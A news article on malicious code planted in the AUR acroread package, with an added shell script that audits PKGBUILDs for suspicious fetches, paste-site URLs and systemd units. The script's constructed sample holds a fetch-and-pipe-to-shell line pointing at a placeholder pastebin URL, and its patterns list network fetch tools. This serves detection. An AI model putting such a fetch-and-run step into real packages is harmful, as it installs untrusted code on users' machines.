Malware found in Arch repository (AUR)


A few days ago, malware, or more precisely malicious code, was detected in a well-known repository of the Arch Linux distribution, specifically the Arch User Repository, better known as the AUR. This is nothing new: we have seen on other occasions how cybercriminals attacked the servers hosting Linux distributions and software packages in order to modify them with malicious code or backdoors, and even altered the checksums so that users were unaware of the attack and did not realise they were installing something insecure on their computers.

Well, this time it happened in the AUR, so the malicious code could have infected users who installed the affected packages from it in their distro. The packages should have been checked before installation: although the AUR makes it very easy to compile and install packages from their source code, that does not mean the source code itself can be trusted. All users should therefore take some precautions before installing, especially when administering a critical server or system...

In fact, the AUR website itself warns that its content is used at the user's own risk, and the discovery of this malware proves the point. In this case, acroread was modified on July 7. The package was orphaned and had no maintainer, and a user called xeactor modified it to include a curl command that automatically downloaded a script from a pastebin; that script launched another script, which in turn installed a systemd unit so that yet another script would be run later.
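The attack chain just described lends itself to a simple pre-install check. The following shell script is an added example written for this article (it is not code from the Arch project or from the AUR) that scans a PKGBUILD before running makepkg and flags the three things described above: a curl or wget invocation inside a build step (makepkg should be fetching everything listed in source=(), so a manual download is suspicious), a pastebin URL, a download piped straight into a shell, and a systemd unit installed by the package. The PKGBUILD it examines is a constructed sample with a placeholder package name and URL, not the real acroread package.

```shell
#!/bin/sh
# Added example: a reviewer's check for an AUR PKGBUILD before makepkg.
# Not part of the Arch project; pattern list is based on the acroread write-up.

# Count lines matching $2 in $body, report them on stderr under label $1,
# and add the count to $total. Comment lines were stripped beforehand.
_check() {
  label="$1"; pattern="$2"
  n=$(printf '%s\n' "$body" | grep -cE "$pattern" || true)
  if [ "$n" -gt 0 ]; then
    printf '[%s] %s line(s):\n' "$label" "$n" >&2
    printf '%s\n' "$body" | grep -nE "$pattern" >&2
    total=$((total + n))
  fi
}

# Print the total number of suspicious lines found in the given PKGBUILD.
audit_pkgbuild() {
  total=0
  # drop comment lines so a comment that merely mentions a tool is ignored
  body=$(grep -v '^[[:space:]]*#' "$1" || true)
  _check "remote fetch in build step" '(^|[^[:alnum:]_])(curl|wget)([^[:alnum:]_]|$)'
  _check "paste-site URL" 'pastebin'
  _check "download piped to shell" '[|][[:space:]]*(sh|bash)([[:space:]]|$)'
  _check "systemd unit installed by package" 'systemd/system|systemctl|\.service'
  echo "$total"
  return 0
}

# Constructed sample PKGBUILD modelled on the incident (placeholder name/URLs).
write_sample_pkgbuild() {
  cat > "$1" <<'EOF'
pkgname=example-viewer
pkgver=1.0
pkgrel=1
arch=('x86_64')
source=("https://example.invalid/${pkgname}-${pkgver}.tar.gz")
sha256sums=('SKIP')

package() {
  cd "${srcdir}/${pkgname}-${pkgver}"
  install -Dm755 viewer "${pkgdir}/usr/bin/viewer"
  curl -s https://pastebin.com/raw/PLACEHOLDER | sh
  install -Dm644 viewer-update.service "${pkgdir}/usr/lib/systemd/system/viewer-update.service"
}
EOF
}

# Constructed clean PKGBUILD for comparison: same package, no extra steps.
write_clean_pkgbuild() {
  cat > "$1" <<'EOF'
pkgname=example-viewer
pkgver=1.0
pkgrel=1
arch=('x86_64')
source=("https://example.invalid/${pkgname}-${pkgver}.tar.gz")
sha256sums=('SKIP')

package() {
  cd "${srcdir}/${pkgname}-${pkgver}"
  install -Dm755 viewer "${pkgdir}/usr/bin/viewer"
}
EOF
}

# Usage: run the check over the constructed sample.
sample=$(mktemp)
write_sample_pkgbuild "$sample"
echo "suspicious lines in sample: $(audit_pkgbuild "$sample")"
rm -f "$sample"
```

On a real package you would run `audit_pkgbuild PKGBUILD` on the directory fetched from the AUR, and also on any `.install` file it ships, since post-install hooks run as root. A non-zero count is a reason to read the file by hand, not proof of compromise: a few legitimate packages do enable a service in `.install`, but a fetch from a paste site at package time has no honest use.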

It appears that two other AUR packages were modified in the same way for illicit purposes. For now, those responsible for the repository have removed the altered packages and deleted the account of the user who made the changes, so the rest of the packages appear to be safe for the moment. For the reassurance of those affected, the malicious code did nothing really serious on the affected machines: it only tried (only tried, because an error in one of the scripts prevented greater harm) to gather certain information from the victim's system.
